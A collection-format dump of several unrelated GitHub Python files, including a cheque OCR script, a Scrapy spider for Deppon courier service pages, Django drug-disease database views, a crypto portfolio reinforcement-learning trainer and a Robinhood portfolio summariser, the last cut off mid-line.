lr_min=lr_min, lr_max=lr_max, weight_decay=weight_decay)\n trained_models.append(model)\n \n return 
tuple(trained_models)","repo_name":"the-infiltrator/White-Noise-Analysis-for-Neural-Networks","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1454069716","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\nfrom numpy import newaxis\r\nimport numpy as np\r\nimport cv2\r\nimport os\r\nimport argparse\r\nimport time\r\nfrom region_detection import detectionClass\r\nfrom utils import load_image_into_numpy_array,region_ocr,skew_correction\r\nimport pytesseract\r\nimport tensorflow as tf\r\nfrom tqdm import tqdm\r\nimport json\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n parser = argparse.ArgumentParser(description='cheque-extract')\r\n parser.add_argument(\"--testImagePath\", type=str,dest=\"test_path\" ,help=\"Path of test Images\",default='./test/',action=\"store\")\r\n args = parser.parse_args()\r\n \r\n regionapi = detectionClass()\r\n\r\n labels =['Pay','Data','Amount','Rupees','AC','Signature','MICR']\r\n \r\n output_path = './output_file/'\r\n if not os.path.exists(output_path):\r\n os.makedirs(output_path)\r\n \r\n testImagePath = args.test_path\r\n \r\n fileName = os.listdir(testImagePath)\r\n \r\n for i in tqdm(range(len(fileName))):\r\n recognized = {}\r\n start_time = time.time()\r\n imr = load_image_into_numpy_array(testImagePath+fileName[i])\r\n \r\n imr = skew_correction(imr) # skewness correction\r\n \r\n boxes,classes,scores = regionapi.run(imr) # cheque region detection\r\n \r\n for row in range(len(classes)): \r\n \r\n width = boxes[row][2]- boxes[row][0]\r\n height = boxes[row][3]- boxes[row][1]\r\n \r\n if scores[row]>0.12:\r\n \r\n croppedImage = imr[boxes[row][1]:boxes[row][3],boxes[row][0]:boxes[row][2]]\r\n sub_row ={}\r\n if 'MICR'==labels[classes[row]-1]:\r\n text = pytesseract.image_to_string(croppedImage,lang='mcr') \r\n sub_row['ocr'] = text \r\n sub_row['pos'] = boxes[row] \r\n recognized['MICR'] = sub_row \r\n elif 'Signature' !=labels[classes[row]-1]:\r\n text,conf = region_ocr(croppedImage)\r\n sub_row['ocr'] =text\r\n sub_row['pos'] = boxes[row]\r\n sub_row['confidence'] = conf\r\n recognized[labels[classes[row]-1]] = sub_row\r\n \r\n end_time = time.time()\r\n \r\n print('predicted time', end_time-start_time)\r\n\r\n \r\n filename =output_path+\"/\"+fileName[0:-3]+'.json'\r\n with open(filename, 'w') as f:\r\n f.write(json.dumps(recognized , ensure_ascii=False, indent=2, separators=(',', ': '))) \r\n\r\n \r\n print(\"output files saved in \"+output_path)\r\n","repo_name":"dsabarinathan/cheque-extract","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"14247039813","text":"# -*- coding: utf-8-*-\n# 命名比较标准了 selenium 6 24 99\nfrom shunfeng.items import ServiceItem\nfrom shunfeng.items import TypeItem\nfrom shunfeng.util import Extract\nimport scrapy\n\nclass DebangSpider(scrapy.Spider):\n name = 'debang'\n allowed_domains = ['www.deppon.com']\n start_urls = ['https://www.deppon.com/newwebsite/products',\n 'https://www.deppon.com/newwebsite/products/detail?contentid=ff80808165ce45970165ce917d4a04a2&tagname=%E4%BA%A7%E5%93%81%E4%BB%8B%E7%BB%8D-%E5%A2%9E%E5%80%BC%E6%9C%8D%E5%8A%A1', \n 'https://www.deppon.com/newwebsite/products/detail?contentid=ff80808165ce45970165ce917e5204b2&tagname=%E4%BA%A7%E5%93%81%E4%BB%8B%E7%BB%8D-%E5%A2%9E%E5%80%BC%E6%9C%8D%E5%8A%A1',\n 
'https://www.deppon.com/newwebsite/products/detail?contentid=ff80808165ce45970165ce917e7404b4&tagname=%E4%BA%A7%E5%93%81%E4%BB%8B%E7%BB%8D-%E5%A2%9E%E5%80%BC%E6%9C%8D%E5%8A%A1',\n 'https://www.deppon.com/newwebsite/products/detail?contentid=ff80808165ce45970165ce916eee03e6&tagname=%E4%BA%A7%E5%93%81%E4%BB%8B%E7%BB%8D-%E5%A2%9E%E5%80%BC%E6%9C%8D%E5%8A%A1']\n \n \n ValueAddedServicesrUrls = [\n #其他\n 'https://www.deppon.com/newwebsite/products/detail?contentid=ff80808165ce45970165ce917d4a04a2&tagname=%E4%BA%A7%E5%93%81%E4%BB%8B%E7%BB%8D-%E5%A2%9E%E5%80%BC%E6%9C%8D%E5%8A%A1',\n #代收货款 \n 'https://www.deppon.com/newwebsite/products/detail?contentid=ff80808165ce45970165ce917e5204b2&tagname=%E4%BA%A7%E5%93%81%E4%BB%8B%E7%BB%8D-%E5%A2%9E%E5%80%BC%E6%9C%8D%E5%8A%A1',\n #报价运输\n 'https://www.deppon.com/newwebsite/products/detail?contentid=ff80808165ce45970165ce917e7404b4&tagname=%E4%BA%A7%E5%93%81%E4%BB%8B%E7%BB%8D-%E5%A2%9E%E5%80%BC%E6%9C%8D%E5%8A%A1',\n #安全包装\n 'https://www.deppon.com/newwebsite/products/detail?contentid=ff80808165ce45970165ce916eee03e6&tagname=%E4%BA%A7%E5%93%81%E4%BB%8B%E7%BB%8D-%E5%A2%9E%E5%80%BC%E6%9C%8D%E5%8A%A1'\n ]\n links = []\n prefix = '德邦快递-'\n def parse(self, response):\n if response.url == self.start_urls[0]:\n ulNodes = response.xpath('//div[@class=\"row no-gutters align-content-center white\"]')[1].xpath('.//ul') \n typeItem = TypeItem()\n for ul in ulNodes :\n aNodes = ul.xpath('./li/a')\n for i,aNode in enumerate(aNodes):\n if i == 0:\n typeItem['typeName'] = self.prefix + aNode.xpath('./text()').extract()[0]\n else:\n if typeItem['typeName'] != '德邦快递-增值服务':\n self.links.append(aNode.xpath('./@href').extract()[0])\n typeItem['serviceName'] = self.prefix + aNode.xpath('./text()').extract()[0]\n# yield typeItem\n yield(typeItem)\n typeItem['typeName'] = self.prefix + '增值服务'\n typeItem['serviceName'] = self.prefix + '超重货操作费'\n yield typeItem\n #yield('#',typeItem)\n for link in self.links: \n link = link.replace('{{baseUrl}}','https://www.deppon.com/newwebsite')\n yield scrapy.Request(link, callback=self.parse)\n elif response.url in self.ValueAddedServicesrUrls:\n serviceItem = ServiceItem()\n if response.url == self.ValueAddedServicesrUrls[0]:\n nodes = response.xpath('//section[@class=\"component fs14 lh24 border_line\"]') \n for node in nodes:\n text = ''\n ps = node.xpath('.//p')\n for p in ps:\n t = Extract.extractNodeText(p)\n ptext = p.extract()\n if p == ps[-1]:\n text = text+t\n serviceItem['serviceItemDesc'] = text\n text =''\n yield(serviceItem)\n elif p == ps[0]:\n serviceItem['serviceName'] = self.prefix + t\n serviceItem['serviceItemName'] = '服务介绍'\n text = ''\n elif 'fs18 lh28' in ptext or '18px' in ptext:\n if p != ps[1]:\n serviceItem['serviceItemDesc'] = text\n yield(serviceItem)\n serviceItem['serviceName'] = self.prefix + t\n serviceItem['serviceItemName'] = '服务介绍'\n text = ''\n elif '24' in ptext or '15px' in ptext:\n serviceItem['serviceItemDesc'] = text\n yield(serviceItem)\n serviceItem['serviceItemName'] = t\n text = ''\n else:\n text = text + t\n serviceItem['serviceName'] = '德邦快递-超重货操作费'\n serviceItem['serviceItemName'] = '服务介绍'\n serviceItem['serviceItemDesc'] = '单件货物重量大于500KG且小于等于1000KG范围内,收取超重货操作服务费100元/件;单件货物重量大于1000KG且小于等于2000KG范围内,收取超重货操作服务费200元/件;若一票货中多件货物满足超重货操作费收取标准,则这一票货收取的重货操作服务费为各件超重货操作费总和。'\n yield(serviceItem)\n elif response.url == self.ValueAddedServicesrUrls[1]: \n ps = response.xpath('//section[@class=\"component fs14 lh24 border_line\"]/p')\n text = ''\n serviceItem['serviceName'] = self.prefix + '代收货款'\n for p in ps:\n t 
= Extract.extractNodeText(p)\n ptext = p.extract()\n if p == ps[-1]:\n text = text+t\n serviceItem['serviceItemDesc'] = text\n text =''\n yield(serviceItem)\n elif p == ps[0]:\n serviceItem['serviceItemName'] = t\n text = ''\n elif '28' in ptext:\n serviceItem['serviceItemDesc'] = text\n yield(serviceItem)\n serviceItem['serviceItemName'] = t\n text = ''\n else:\n text = text + t\n serviceItem['serviceItemName'] = '服务介绍'\n serviceItem['serviceItemDesc'] = '提供“即日退”和“三日退”两种代收货款服务。替您收回货款后,在承诺的退款时效内将货款汇出,让您安全、及时地回笼资金'\n yield(serviceItem)\n elif response.url == self.ValueAddedServicesrUrls[2]:\n ps = response.xpath('//section[@class=\"fs14 lh24 border_line\"]/p')\n text = ''\n serviceItem['serviceName'] = self.prefix + '保价运输'\n for p in ps:\n t = Extract.extractNodeText(p)\n ptext = p.extract()\n if p == ps[-1]:\n text = text+t\n serviceItem['serviceItemDesc'] = text\n text =''\n yield(serviceItem)\n elif p == ps[0]:\n serviceItem['serviceItemName'] = t\n text = ''\n elif '28' in ptext:\n serviceItem['serviceItemDesc'] = text\n yield(serviceItem)\n serviceItem['serviceItemName'] = t\n text = ''\n else:\n text = text + '\\n' + t\n serviceItem['serviceItemName'] = '服务介绍'\n serviceItem['serviceItemDesc'] = '保价运输是指德邦与您共同确定的以托运人申明货物价值为基础的一种特殊运输方式。您向德邦声明托运货物的实际价值,若货物出险,即可获得我司的相应赔偿'\n yield(serviceItem)\n else: \n serviceItem['serviceName'] = self.prefix + '安全包装服务'\n serviceItem['serviceItemName'] = '服务介绍'\n serviceItem['serviceItemDesc'] = '德邦将为您的货物量身定制安全放心的包装解决方案,让您更安心'\n yield(serviceItem)\n serviceItem['serviceItemName'] = '服务区域'\n serviceItem['serviceItemDesc'] = '中国大陆地区、香港地区'\n yield(serviceItem)\n cardNodes = response.xpath('//div[@class = \"card-body\"]')\n for card in cardNodes:\n if card.xpath('./h4') != []:\n serviceItem['serviceItemName'] = card.xpath('./h4/text()').extract()[0]\n serviceItem['serviceItemDesc'] = card.xpath('./p/text()').extract()[0]\n elif card.xpath('./p[2]') != []:\n serviceItem['serviceItemName'] = '包装材料介绍-' + card.xpath('./p[1]/text()').extract()[0]\n serviceItem['serviceItemDesc'] = card.xpath('./p[2]/text()').extract()[0]\n else:\n serviceItem['serviceItemDesc'] = '新型塑料缓冲材料,质地轻、透明性好,良好的减震性、抗冲击性,是易碎易损货物包装的首选良材'\n serviceItem['serviceItemName'] = '包装材料介绍-' + card.xpath('./p[1]/text()').extract()[0]\n yield(serviceItem)\n else:\n serviceItem = ServiceItem()\n #serviceName serviceItemName serviceItemDesc\n pNodes = response.xpath('//section[@class = \"content_wrapper h-100\"]/section/section/p')\n for i,p in enumerate(pNodes):\n if i == 0:\n serviceItem['serviceName'] = self.prefix +Extract.extractNodeText(p)\n yield(serviceItem['serviceName'])\n if i == 1:\n serviceItem['serviceItemName'] = '服务介绍'\n serviceItem['serviceItemDesc'] = Extract.extractNodeText(p)\n yield(serviceItem)\n cardNodes = response.xpath('//div[@class = \"card-body\"]')\n for card in cardNodes:\n if card.xpath('./h4') == []:\n continue\n else:\n serviceItem['serviceItemName'] = '产品优势-' + card.xpath('./h4/text()').extract()[0]\n if card.xpath('./p') == []:\n serviceItem['serviceItemDesc'] = card.xpath('./ul/li/text()').extract()[0]\n else:\n serviceItem['serviceItemDesc'] = card.xpath('./p/text()').extract()[0]\n yield(serviceItem)","repo_name":"ZPS233/Baidubaidke-spider","sub_path":"shunfeng/spiders/debang.py","file_name":"debang.py","file_ext":"py","file_size_in_byte":11064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42991543226","text":"from django.shortcuts import render\nfrom .serializers import *\nfrom .models import *\nfrom 
rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\n\nimport pandas as pd\n\n\n# Creating views here.\n@api_view([\"GET\"])\ndef get_all_disease(request, disease_name):\n # print(disease_name)\n if request.method == \"GET\":\n try:\n disease = Disease.objects.get(DiseaseName=disease_name)\n serializedData = DiseaseSerializer(disease)\n except:\n return Response(status=status.HTTP_404_NOT_FOUND)\n \n return Response(serializedData.data)\n \n@api_view([\"GET\"])\ndef get_all_smil(request, disease_name):\n # print(disease_name)\n if request.method == \"GET\":\n try:\n disease = Disease.objects.get(DiseaseName=disease_name)\n # print(disease)\n drugs = disease.drugs_for_disease.exclude(DrugSMIL = 'default_value')\n drugs = drugs.filter(ClinicalStatus = 'Phase 3')[0:5]\n # print(drugs)\n serializedData = DrugSMILSerializer(drugs, many=True)\n except:\n return Response(status=status.HTTP_404_NOT_FOUND)\n \n return Response(serializedData.data) \n\n@api_view([\"GET\"])\ndef get_all_drugs(request, drug_name):\n # print(drug_name)\n if request.method == \"GET\":\n try:\n drug = Drug.objects.get(DrugName=drug_name)\n serializedData = DiseaseSerializer(drug)\n except:\n return Response(status=status.HTTP_404_NOT_FOUND)\n \n return Response(serializedData.data)\n\n\n\n\n@api_view([\"GET\"])\ndef create_database(request):\n # df = pd.read_excel('DrugXDiseaseMapping.xlsx')\n\n disease_id = \"234\"\n disease_name = \"aml\"\n\n drug_id = \"567\"\n drug_name = \"ALD\"\n clinical_status = \"Phase-1\"\n\n target_id = \"789\"\n target_name = \"DNA TOPO\"\n\n df = pd.read_excel('DrugXDiseaseMapping.xlsx')\n df2 = pd.read_excel('TargetXDrug.xlsx')\n df3 = pd.read_excel('TargetIDXTargetName.xlsx')\n\n # df = pd.DataFrame(df, columns=['DrugUID', 'DrugName', \n # 'DiseaseName', 'DiseaseID', \"ClinicalStatus\"])\n\n Drugs = []\n Targets = []\n i=0\n for ind in df.index:\n i+=1\n print(i)\n DrugUID = df['DrugUID'][ind]\n for ind2 in df2.index:\n # print(DrugUID)\n if df2['DrugID'][ind2] == DrugUID:\n for ind3 in df3.index:\n\n if df3['TargetID'][ind3] == df2['TargetID'][ind2]:\n\n DrugUID = df['DrugUID'][ind]\n # print(\"DiseaseName:\", df['DiseaseName'][ind], \"\\tDrugUID:\", df['DrugUID'][ind], \"\\tDrugName:\", df['DrugName'][ind])\n # print(\"TargetName:\", df3['TargetName'][ind3])\n\n disease_id = df['DiseaseID'][ind]\n disease_name = df['DiseaseName'][ind]\n\n drug_id = df['DrugUID'][ind]\n drug_name = df['DrugName'][ind]\n clinical_status = df['ClinicalStatus'][ind]\n\n target_id = df2['TargetID'][ind2]\n target_name = df3['TargetName'][ind3]\n\n\n\n try:\n temp_d = Disease.objects.get(DiseaseID = disease_id)\n except:\n temp_d = Disease(DiseaseID=disease_id, DiseaseName=disease_name)\n temp_d.save()\n\n # print(temp_d) \n\n try:\n temp_drug = Drug.objects.get(DrugID = drug_id)\n except:\n temp_drug = Drug(DrugID=drug_id, DrugName=drug_name,ClinicalStatus= clinical_status)\n temp_drug.save() \n temp_drug.Diseases.add(temp_d)\n\n # print(temp_drug) \n\n try:\n temp_t = Target.objects.get(TargetID = target_id)\n except:\n temp_t = Target(TargetID=target_id, TargetName=target_name)\n temp_t.save()\n temp_t.Diseases.add(temp_d)\n temp_t.Drugs.add(temp_drug)\n\n if request.method == \"GET\":\n\n return Response(status=status.HTTP_201_CREATED) \n\n# @api_view([\"POST\"])\n# def post_disease(request):\n# # print(\"Posting\")\n# if request.method == \"POST\":\n# # print(\"Posting23\")\n# serialized_bloodtest_data = 
BloodTestSerializer(data=request.data)\n \n# if serialized_bloodtest_data.is_valid():\n# serialized_bloodtest_data.save()\n\n# return Response(status=status.HTTP_201_CREATED)\n# return Response(\n# serialized_bloodtest_data.errors, status=status.HTTP_400_BAD_REQUEST\n# )\n\n# @api_view([\"POST\"])\n# def post_bloodtest_data(request):\n# # print(\"Posting\")\n# if request.method == \"POST\":\n# # print(\"Posting23\")\n# serialized_bloodtest_data = BloodTestSerializer(data=request.data)\n \n# if serialized_bloodtest_data.is_valid():\n# serialized_bloodtest_data.save()\n\n# return Response(status=status.HTTP_201_CREATED)\n# return Response(\n# serialized_bloodtest_data.errors, status=status.HTTP_400_BAD_REQUEST\n# )\n\n\n\n# @api_view([\"GET\"])\n# def get_bloodtest_data(request):\n# if request.method == \"GET\":\n# bloodtest_data = BloodTestData.objects.all()\n# serializedData = BloodTestSerializer(bloodtest_data, many=True)\n# return Response(serializedData.data)\n \n\n@api_view([\"GET\"])\ndef push_smil(request):\n\n df = pd.read_excel('23.xlsx')\n\n for ind in df.index:\n drug_id = df['DrugUID'][ind]\n drug_smil = df['DrugSMIL'][ind]\n\n try:\n drug = Drug.objects.get(DrugID=drug_id)\n except:\n continue\n\n drug.DrugSMIL = drug_smil\n drug.save()\n # print(drug_id, drug.DrugID, drug.DrugName, drug.DrugSMIL, drug_smil)\n\n\n\n\n if request.method == \"GET\":\n return Response(status=status.HTTP_201_CREATED)\n ","repo_name":"emonmeena/targetid","sub_path":"drugdiscovery/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44028234347","text":"#coding: utf-8\n\nimport os\nimport re\nfrom unittest import TestCase\nfrom io import BytesIO, open\n\nfrom baraag.evernote import enml_to_markdown\n\nFIXTURES_DIR = os.path.join(\n os.path.abspath(os.path.dirname(__file__)), 'fixtures')\n\nclass TestEnmlToMarkdown(TestCase):\n\n def test_convert_simple(self):\n self._test_convert('simple')\n\n def test_convert_multibyte(self):\n self._test_convert('multibyte')\n\n def test_convert_image(self):\n self._test_convert('image')\n\n def _test_convert(self, fixture):\n enml_path = os.path.join(FIXTURES_DIR, '%s_content.enml' % fixture)\n expected_md_path = re.sub(r'enml$', 'md', enml_path)\n\n with open(enml_path, 'rb') as enml_file, open(expected_md_path, 'rb') as expected_file:\n\n converted = BytesIO()\n enml_to_markdown(enml_file, converted, '/images/')\n\n self.assertEqual(converted.getvalue(), expected_file.read().rstrip())\n\n","repo_name":"orangain/baraag","sub_path":"baraag/tests/test_evernote.py","file_name":"test_evernote.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"37176164039","text":"from agent import *\nfrom environment import *\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nN_ASSETS = 15\nbatch_size = 10\nmax_experiences = 100\nmin_experiences = 1\nagent = Agent(N_ASSETS, batch_size, max_experiences, min_experiences)\nenv = CryptoEnvironment()\n\nwindow_size = 180\nN = 300\n# rebalance_period = 90 ignoring rebalancing for now\ncopy_step = 25\nportfolio_size = N_ASSETS\naction_size = 3\ninput_shape = (portfolio_size, portfolio_size, )\nhidden_units = [100, 50]\ncopy_steps = 10\nnum_expReplay = 0\nTargetNet = DQNModel(input_shape, hidden_units, action_size, portfolio_size)\n\ndef train():\n global num_expReplay\n for e in range(N):\n 
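# One episode: sample a random start index in the training prices, roll the window forward one step at a time, store (s, a, r, s') transitions in the replay buffer, and sync TargetNet every copy_steps iterations.\n 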
agent.is_eval = False\n data_length = len(env.train_prices) #total data available for training\n\n returns_history = []\n rewards_history = []\n\n #for equal weight allocation case - base case\n returns_history_equal = []\n equal_rewards = []\n\n actionBuffer = []\n\n print(\"Episode \" + str(e) + \"/\" + str(N), 'epsilon', agent.epsilon)\n\n random_start = np.random.randint(window_size+1, data_length-window_size-1)\n s = env.get_state(random_start, random_start+window_size) #any state of len window_size\n total_profit = 0\n step = 0\n\n for comp_period in range(window_size, data_length):\n #, rebalance_period):\n\n start_period = comp_period-window_size #-rebalance_period\n\n s_ = env.get_state(start_period, comp_period) #for first iteration - start till window_size\n action = agent.policy(s_)\n actionBuffer.append(action)\n\n weighted_returns, reward = env.get_reward(action, start_period, comp_period)\n weighted_returns_equal, reward_equal = env.get_reward(\n np.ones(agent.portfolio_size) / agent.portfolio_size, start_period, comp_period)\n\n rewards_history.append(reward)\n equal_rewards.append(reward_equal)\n returns_history.extend(weighted_returns)\n returns_history_equal.extend(weighted_returns_equal)\n\n done = comp_period == data_length - 1\n agent.add_experience({\"s\": s, \"s2\": s_, \"a\": action, \"r\": reward, \"done\": done}) #adding this iteration vars to experience buffer\n num_expReplay+=1\n\n if num_expReplay >= batch_size: #start training only if there are enough examples in replay buffer\n agent.train(TargetNet.get_model())\n s = s_\n if step % 30 == 0:\n print(step)\n step+=1\n\n if step % copy_steps == 0: #copying the weights to TargetNet at specified intervals\n TargetNet.copy_weights(agent.train_model)\n\n if agent.epsilon > agent.epsilon_min:\n agent.epsilon *= agent.epsilon_decay\n print(\"Epsilon: \" + str(agent.epsilon))\n\n model_json = agent.train_model.to_json()\n with open(\"models/model.json\", \"w\") as json_file:\n json_file.write(model_json)\n agent.train_model.save_weights(\"models/model\" + str(e) + \".h5\")\n\n rl_result = np.array(returns_history).cumsum()\n equal_result = np.array(returns_history_equal).cumsum()\n\n print(\"Done\")\n\n plt.figure(figsize = (12, 2))\n plt.plot(rl_result, color = 'black', ls = '-')\n plt.plot(equal_result, color = 'red', ls = '--')\n plt.show()\n\n plt.figure(figsize = (12, 2))\n for a in actionBuffer:\n plt.bar(np.arange(N_ASSETS), a, color = 'red', alpha = 0.25)\n plt.xticks(np.arange(N_ASSETS), env.train_data.columns, rotation='vertical')\n plt.show()\n\nif __name__ == '__main__':\n train()\n","repo_name":"pia-nyk/CryptoCoach","sub_path":"reinforcement_learning/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31922090941","text":"import datetime\nimport logging\nimport os\nimport uuid\n\nimport pytest\n\nfrom kubeflow.examples.notebook_tests import nb_test_util\nfrom kubeflow.testing import util\n\ndef test_mnist_gcp(record_xml_attribute, name, namespace, # pylint: disable=too-many-branches,too-many-statements\n repos, image):\n '''Generate Job and submit.'''\n if not name:\n name = \"mnist-\" + datetime.datetime.now().strftime(\"%H%M%S\") + \"-\"\n name = name + uuid.uuid4().hex[0:3]\n\n util.set_pytest_junit(record_xml_attribute, \"test_mnist_gcp\")\n\n notebook_path = 
\"kubeflow/examples/mnist/mnist_gcp.ipynb\"\n nb_test_util.run_papermill_job(notebook_path, name, namespace, repos, image)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO,\n format=('%(levelname)s|%(asctime)s'\n '|%(pathname)s|%(lineno)d| %(message)s'),\n datefmt='%Y-%m-%dT%H:%M:%S',\n )\n logging.getLogger().setLevel(logging.INFO)\n pytest.main()\n","repo_name":"qq2016/kubeflow_learning","sub_path":"py/kubeflow/examples/notebook_tests/mnist_gcp_test.py","file_name":"mnist_gcp_test.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12848955358","text":"import Robinhood\nimport stock_categories\nimport logging\nimport argparse\nimport getpass\nimport time\n\n_START_TIMESTAMP = time.strftime(\"%y%m%d_%H%M%S\") # used in filenames\n\nclass RobinhoodManager():\n\tdef __init__(self, username, password):\n\t\tself._trader = Robinhood.Robinhood()\n\t\tself._cached_portfolio_dictionary = None\n\t\tself._cached_positions_dictionary = None\n\n\t\ttry:\n\t\t\tlogged_in = self._trader.login(username=username, password=password)\n\t\texcept Robinhood.exceptions.LoginFailed:\n\t\t\traise RuntimeError(\"Login failed, wrong password?\")\n\n\tdef _update_portfolio_dictionary(self):\n\n\t\tportfolio = self._trader.portfolios()\n\t\t# Example portfolio dictionary:\n\t\t# {'account': 'https://api.robinhood.com/accounts/123456789/',\n\t\t# \"Adjusted\" values show how much equity you would have had\n\t\t# yesterday, adjusted by any new/pending deposits. This allows\n\t\t# calculating gains/losses between yesterday & today.\n\t\t# 'adjusted_equity_previous_close': '1234.5678',\n\t\t# 'adjusted_portfolio_equity_previous_close': '1234.5678',\n\t\t# 'equity': '1234.5678',\n\t\t# 'equity_previous_close': '1234.5678',\n\t\t# 'portfolio_equity_previous_close': '1234.5678',\n\t\t# 'excess_maintenance': '1234.5678',\n\t\t# 'excess_maintenance_with_uncleared_deposits': '1234.5678',\n\t\t# 'excess_margin': '1234.5678',\n\t\t# 'excess_margin_with_uncleared_deposits': '1234.5678',\n\t\t# 'extended_hours_equity': '1234.5678',\n\t\t# 'extended_hours_market_value': '1234.5678',\n\t\t# 'extended_hours_portfolio_equity': '1234.5678',\n\t\t# 'last_core_equity': '1234.5678',\n\t\t# 'last_core_market_value': '1234.5678',\n\t\t# 'last_core_portfolio_equity': '1234.5678',\n\t\t# 'market_value': '1234.5678',\n\t\t# 'start_date': '2020-01-01',\n\t\t# 'unwithdrawable_deposits': '0.0000',\n\t\t# 'unwithdrawable_grants': '0.0000',\n\t\t# 'url': 'https://api.robinhood.com/portfolios/123456789/',\n\t\t# 'withdrawable_amount': '1234.5678'}\n\n\t\tequity = float(portfolio['equity'])\n\t\tequity_previous_close = float(portfolio['adjusted_equity_previous_close'])\n\t\tcash_amount = equity - float(portfolio['market_value'])\n\n\t\tresult_dict = {\n\t\t\t\"equity\": equity,\n\t\t\t\"equity_previous_close\": equity_previous_close,\n\t\t\t\"equity_percent_change_today\": (equity - equity_previous_close) / equity_previous_close,\n\t\t\t\"cash_amount\": cash_amount,\n\t\t\t\"cash_percentage\": float(cash_amount / equity)\n\t\t}\n\t\tself._cached_portfolio_dictionary = result_dict\n\n\t@property\n\tdef portfolio_dictionary(self):\n\t\tif self._cached_portfolio_dictionary is None:\n\t\t\tself._update_portfolio_dictionary()\n\n\t\treturn self._cached_portfolio_dictionary\n\n\tdef portfolio_readable_string(self):\n\t\tportfolio = self.portfolio_dictionary\n\t\treturn \"${:.2f} {:+.1f}%; ${:.2f} ({:.0f}%) 
cash\".format(\n\t\t\tportfolio[\"equity\"],\n\t\t\tportfolio[\"equity_percent_change_today\"]*100,\n\t\t\tportfolio[\"cash_amount\"],\n\t\t\tportfolio[\"cash_percentage\"]*100,\n\t\t)\n\n\tdef _update_positions_dictionary(self):\n\t\tpositions = self._trader.positions()['results']\t\t\n\t\tnumber_of_positions = int(len(positions))\n\t\tresults = {}\n\t\t\n\t\tfor position in positions:\n\t\t\tquantity = float(position['quantity'])\n\t\t\taverage_buy_price = float(position[\"average_buy_price\"])\n\n\t\t\tinstrument = self._trader.session.get(position['instrument'], timeout=15).json()\n\t\t\tsymbol = instrument[\"symbol\"]\n\t\t\tname = instrument[\"simple_name\"]\n\n\t\t\tquote = self._trader.quote_data(symbol)\n\t\t\tcurrent_price = float(quote[\"last_trade_price\"])\n\t\t\tprevious_close_price = float(quote[\"previous_close\"])\n\t\t\tprice_change_percent_today = (current_price - previous_close_price) / previous_close_price\n\n\t\t\ttotal_cost = quantity * average_buy_price\n\t\t\ttotal_value = quantity * current_price\n\t\t\ttotal_return_amount = total_value - total_cost\n\t\t\ttotal_return_percent = 0 if total_cost == 0 else total_return_amount / total_cost\n\n\t\t\tresults[symbol] = {\n\t\t\t\t\"symbol\": symbol,\n\t\t\t\t\"quantity\": quantity,\n\t\t\t\t\"average_buy_price\": average_buy_price,\n\t\t\t\t\"current_price\": current_price,\n\t\t\t\t\"previous_close_price\": previous_close_price,\n\t\t\t\t\"price_change_percent_today\": price_change_percent_today*100,\n\t\t\t\t\"total_cost\": total_cost,\n\t\t\t\t\"total_value\": total_value,\n\t\t\t\t\"total_return_amount\": total_return_amount,\n\t\t\t\t\"total_return_percent\": total_return_percent*100,\n\t\t\t}\n\n\t\tself._cached_positions_dictionary = results\n\n\t@property\n\tdef positions_dictionary(self):\n\t\tif self._cached_positions_dictionary is None:\n\t\t\tself._update_positions_dictionary()\n\n\t\treturn self._cached_positions_dictionary\n\n\tdef positions_csv(self):\n\t\toutput = \"{},{},{},{},{},{}\\r\\n\".format(\n\t\t\t\"Symbol\",\n\t\t\t\"Price\",\n\t\t\t\"Change\",\n\t\t\t\"Equity\",\n\t\t\t\"Cost\",\n\t\t\t\"Return\",\n\t\t)\n\t\tfor symbol in self.positions_dictionary:\n\t\t\tentry = self.positions_dictionary[symbol]\n\t\t\toutput += \"{},{},{},{},{},{}\\r\\n\".format(\n\t\t\t\tformat(\"{}\".format(entry[\"symbol\"])),\n\t\t\t\tformat(\"${:.3f}\".format(entry[\"current_price\"])),\n\t\t\t\tformat(\"{:.2f}%\".format(entry[\"price_change_percent_today\"])),\n\t\t\t\tformat(\"${:.3f}\".format(entry[\"total_value\"])),\n\t\t\t\tformat(\"${:.3f}\".format(entry[\"total_cost\"])),\n\t\t\t\tformat(\"{:.2f}%\".format(entry[\"total_return_percent\"])),\n\t\t\t)\n\t\treturn output\n\n\tdef positions_readable_table(self):\n\t\tprint(\"{:<7}{:>8}{:>8}{:>8}{:>8}{:>8}\".format(\n\t\t\t\"Symbol\",\n\t\t\t\"Price\",\n\t\t\t\"Change\",\n\t\t\t\"Equity\",\n\t\t\t\"Cost\",\n\t\t\t\"Return\",\n\t\t))\n\t\tfor symbol in self.positions_dictionary:\n\t\t\tentry = self.positions_dictionary[symbol]\n\t\t\tprint(\"{:<7}{:>8}{:>8}{:>8}{:>8}{:>8}\".format(\n\t\t\t\tformat(\"{}\".format(entry[\"symbol\"])),\n\t\t\t\tformat(\"${:.2f}\".format(entry[\"current_price\"])),\n\t\t\t\tformat(\"{:+.1f}%\".format(entry[\"price_change_percent_today\"])),\n\t\t\t\tformat(\"${:.2f}\".format(entry[\"total_value\"])),\n\t\t\t\tformat(\"${:.2f}\".format(entry[\"total_cost\"])),\n\t\t\t\tformat(\"{:+.1f}%\".format(entry[\"total_return_percent\"])),\n\t\t\t))\n\n\ndef print_section_header(text):\n\tprint()\n\tprint(\"{:#^66s}\".format(' ' + text + ' 
